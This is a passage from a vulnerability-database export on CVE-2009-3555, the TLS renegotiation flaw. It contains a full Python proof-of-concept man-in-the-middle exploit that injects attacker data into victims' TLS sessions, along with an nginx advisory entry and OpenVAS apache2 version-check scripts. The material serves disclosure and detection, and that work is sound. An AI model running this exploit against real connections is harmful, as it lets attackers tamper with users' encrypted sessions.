"exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "EXPLOITPACK:8B4E7E8DAE5A13C8250C6C33307CD66C", "href": "", "sourceData": "#!/usr/bin/env python\n\n######################################\n# #\n# RedTeam Pentesting GmbH #\n# kontakt@redteam-pentesting.de #\n# http://www.redteam-pentesting.de #\n# #\n######################################\n\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\n\n# License\n# -------\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\n\n# Timeline\n# --------\n# 2009-12-21 initial public release\n\n# Known Issues\n# ------------\n# Firefox: if it fails connecting to a TLS site too often, falls back to\n# issuing SSLv2 ClientHello only until browser is restarted\n#\n# wget: attempts SSLv2 ClientHello by default\n\n# References\n# ----------\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n# http://www.phonefactor.com/sslgap\n# http://www.extendedsubset.com/\n# http://www.g-sec.lu/practicaltls.pdf\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\n\nimport tlslite\nimport tlslite.api\nimport tlslite.messages\nimport tlslite.constants\nimport struct\nimport socket\nimport threading\nimport array\nimport sys\nimport optparse\n\n\nif not hasattr(threading.Thread, 'name'):\n # emulate python 2.6 threading module for earlier versions\n threading.current_thread = threading.currentThread\n setattr(threading.Thread, 'name',\n property(threading.Thread.getName, threading.Thread.setName))\n\ndef forward(sock1, sock2):\n sock1.settimeout(1.0)\n while True:\n try:\n data = sock1.recv(4096)\n if not data:\n return\n sock2.send(data)\n except socket.error, ex_error:\n if ex_error[0] == 104: # Connection reset by peer\n return\n except socket.timeout, ex_timeout:\n pass\n\n\nclass MessageWrapper(object):\n def __init__(self, version = (3, 1), ssl2 = False):\n self.contentType = tlslite.messages.ContentType.handshake\n self.ssl2 = ssl2\n self.client_version = version\n\n def setType(self, type):\n self.contentType = type\n\n def addBytes(self, bytes):\n self.bytes = bytes\n\n def write(self, trial=False):\n if trial:\n raise Exception('Unsupported')\n return array.array('B', self.bytes)\n\ndef send_record(sock, msg_type, version_major, version_minor, record):\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\n if type(record) != str:\n msg += record.tostring()\n else:\n msg += record\n sock.send(msg)\n\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\n msg = MessageWrapper(version)\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\n msg.setType(type)\n for dummy in sslsock._sendMsg(msg, True):\n pass\n\ndef decrypt_record(sslsock, type, recordbytes):\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\n pass\n return result\n\ndef recv_record(sock):\n try:\n header = sock.recv(5)\n if not header:\n return None, None, None, None\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\n record = ''\n while len(record) != msg_length:\n record += sock.recv(msg_length - len(record))\n return msg_type, msg_version_major, msg_version_minor, record\n except socket.error, ex:\n if ex[0] == 104: # Connection reset by peer\n return\n\ndef recv_clienthello(sock):\n header_bytes = []\n header_bytes.append(sock.recv(1))\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\n if header_bytes[0] & 0x80:\n # Version 2.0 Client \"Record Layer\"\n header_bytes.append(sock.recv(1))\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\n msg_version_major = 2\n msg_version_minor = 0\n msg_type = tlslite.constants.ContentType.handshake\n record = sock.recv(msg_length)\n else:\n header = sock.recv(4)\n msg_type = header_bytes[0]\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\n record = sock.recv(msg_length)\n\n return msg_type, msg_version_major, msg_version_minor, record\n\ndef send_hello_request(sock):\n sock.send(\"\\x16\" # Record Layer: Handshake Message\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\n +\"\\x00\\x04\" # Record Layer Length: 4\n +\"\\x00\" # Handshake Message Type: Hello Request\n +\"\\x00\\x00\\x00\") # Handshake Message Length: 0\n\ndef send_protocol_version_alert(sock):\n sock.send(\"\\x15\" # Record Layer: Alert\"\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\n +\"\\x00\\x02\" # Record Layer Length: 2\n +\"\\x00\" # Alert Message: fatal\n +\"\\x46\") # Alert Message: protocol version\n\n\ndef handle_victim(victim, options, mitmcount):\n\n if options.one_shot and mitmcount != 0:\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect(options.target)\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\n except socket.error, ex:\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n t1 = threading.Thread(target=forward, args=(sock, victim))\n t1.start()\n\n t2 = threading.Thread(target=forward, args=(victim, sock))\n t2.start()\n\n t1.join()\n sock.close()\n\n t2.join()\n victim.close()\n return\n\n # obtain initial \"client hello\" message\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\n if msg_version_major == 2:\n print threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\"\n return\n\n tls_version = (msg_version_major, msg_version_minor)\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\n resume_session = (session_id_length != 0)\n if resume_session:\n print threading.current_thread().name, \"client attempting to resume session\"\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect(options.target)\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\n except socket.error, ex:\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n\n sslsock = tlslite.api.TLSConnection(sock)\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\n handshake_settings.minVersion = tls_version\n handshake_settings.maxVersion = tls_version\n sslsock.handshakeClientCert(settings = handshake_settings)\n\n # inject prefix\n sslsock.write(options.inject)\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\n\n # send original \"client hello\" message over the encrypted channel\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\n\n # now receive serveral TLS messages from the server, decrypt them, and forward\n # them to the client, until the server sends \"server hello done\"\n # these messages include \"server hello\", \"certificate\", \"server key exchange\",\n # unless the client is trying to resume a previous session\n print threading.current_thread().name, \"about to receive server handshake messages\"\n server_handshake_done = False\n while not server_handshake_done:\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\n if result:\n result = decrypt_record(sslsock, msg_type, result)\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\n if result[0] == 0x0e: # server hello done - should terminate handshake\n server_handshake_done = True\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\n server_handshake_done = True\n else:\n print threading.current_thread().name, 'receive from server failed, exiting thread'\n return\n print threading.current_thread().name, \"server handshake done\"\n\n\n # now its the the client's turn to send some messages, e.g.\n # \"client key exchange\" and \"change cipher spec\"\n print threading.current_thread().name, \"about to receive client handshake messages\"\n handshake_finished = False\n while not handshake_finished:\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\n print threading.current_thread().name, msg_type\n send_encapsulated(sslsock, msg_type, record, tls_version)\n if msg_type == 0x14: # change cipher spec\n handshake_finished = True\n\n print threading.current_thread().name, \"client handshake done\"\n\n # message after \"change cipher spec\" must be sent in the \"clear\"\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\n\n # server should now send \"change cipher spec\" message, we decrypt and send that to the victim\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\n result = decrypt_record(sslsock, msg_type, record)\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\n\n # finalize handshake\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\n if record:\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\n else:\n sslsock.sock.close()\n victim.close()\n del sslsock\n return\n\n\n\n # the rest is just forwarding TLS records between both parties,\n # which we cannot interfere with anymore, apart from dropping server\n # responses\n if options.drop:\n sslsock.sock.close()\n del sslsock\n else:\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\n t1.start()\n\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\n t2.start()\n\n if not options.drop:\n t1.join()\n sslsock.sock.close()\n\n t2.join()\n victim.close()\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\n parser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating')\n\n (options, args) = parser.parse_args()\n\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\n print 'Exactly one injection option must be specified'\n sys.exit(1)\n\n if options.inject_file:\n try:\n options.inject = open(options.inject_file, 'r').read()\n except IOError, ex:\n print ex\n sys.exit(1)\n\n if options.inject_base64:\n import base64\n try:\n options.inject = base64.decodestring(options.inject_base64)\n except base64.binascii.Error, ex:\n print 'Error decoding base64 data: %s' % ex\n sys.exit(1)\n\n\n if not options.listen_port or \\\n not options.bind_address or \\\n not options.target or \\\n not options.inject:\n parser.print_help()\n sys.exit(1)\n\n target = options.target.split(':')\n if len(target)==2:\n try:\n target[1] = int(target[1])\n except ValueError:\n target[1] = None\n if len(target)!=2 or not target[0] or not target[1]:\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\n sys.exit(1)\n\n options.target = tuple(target)\n\n try:\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listensocket.bind((options.bind_address, options.listen_port))\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\n except socket.error, ex:\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n listensocket.listen(5)\n\n mitmcount = 0\n\n while True:\n try:\n victim, victimaddr = listensocket.accept()\n print 'New connection from %s:%u' % victimaddr\n\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\n mitmcount += 1\n\n except KeyboardInterrupt, ex:\n print '\\nAborted by user, exiting...'\n listensocket.close()\n sys.exit(1)", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nginx": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 2, "description": "The renegotiation vulnerability in SSL protocol\nSeverity: major\nCVE-2009-3555\nNot vulnerable: 0.8.23+, 0.7.64+\nVulnerable: 0.1.0-0.8.22", "modified": "2009-11-09T17:30:00", "published": "2009-11-09T17:30:00", "id": "NGINX:CVE-2009-3555", "href": "http://nginx.org/en/security_advisories.html", "type": "nginx", "title": "The renegotiation vulnerability in SSL protocol", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "openvas": [{"lastseen": "2018-01-02T10:54:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-990-2", "modified": "2017-12-26T00:00:00", "published": "2010-09-27T00:00:00", "id": "OPENVAS:1361412562310840504", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840504", "type": "openvas", "title": "Ubuntu Update for apache2 vulnerability USN-990-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_990_2.nasl 8246 2017-12-26 07:29:20Z teissa $\n#\n# Ubuntu Update for apache2 vulnerability USN-990-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-860-1 introduced a partial workaround to Apache that disabled client\n initiated TLS renegotiation in order to mitigate CVE-2009-3555. USN-990-1\n introduced the new RFC5746 renegotiation extension in openssl, and\n completely resolves the issue.\n\n After updating openssl, an Apache server will allow both patched and\n unpatched web browsers to connect, but unpatched browsers will not be able\n to renegotiate. This update introduces the new SSLInsecureRenegotiation\n directive for Apache that may be used to re-enable insecure renegotiations\n with unpatched web browsers. For more information, please refer to:\n http://httpd.apache.org/docs/2.2/mod/mod_ssl.html\n http://httpd.apache.org/docs/2.2/mod/mod_ssl.html\n \n Original advisory details:\n \n Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds backported support\n for the new RFC5746 renegotiation extension and will use it when both the\n client and the server support it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-990-2\";\ntag_affected = \"apache2 vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-990-2/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840504\");\n script_version(\"$Revision: 8246 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 08:29:20 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-27 08:14:44 +0200 (Mon, 27 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"990-2\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Ubuntu Update for apache2 vulnerability USN-990-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.12-1ubuntu2.3\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.55-4ubuntu2.11\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.14-5ubuntu8.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.11-2ubuntu2.7\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.8-1ubuntu0.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:53:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of gnutls", "modified": "2017-12-26T00:00:00", "published": "2010-06-28T00:00:00", "id": "OPENVAS:1361412562310862207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862207", "type": "openvas", "title": "Fedora Update for gnutls FEDORA-2010-9487", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnutls FEDORA-2010-9487\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 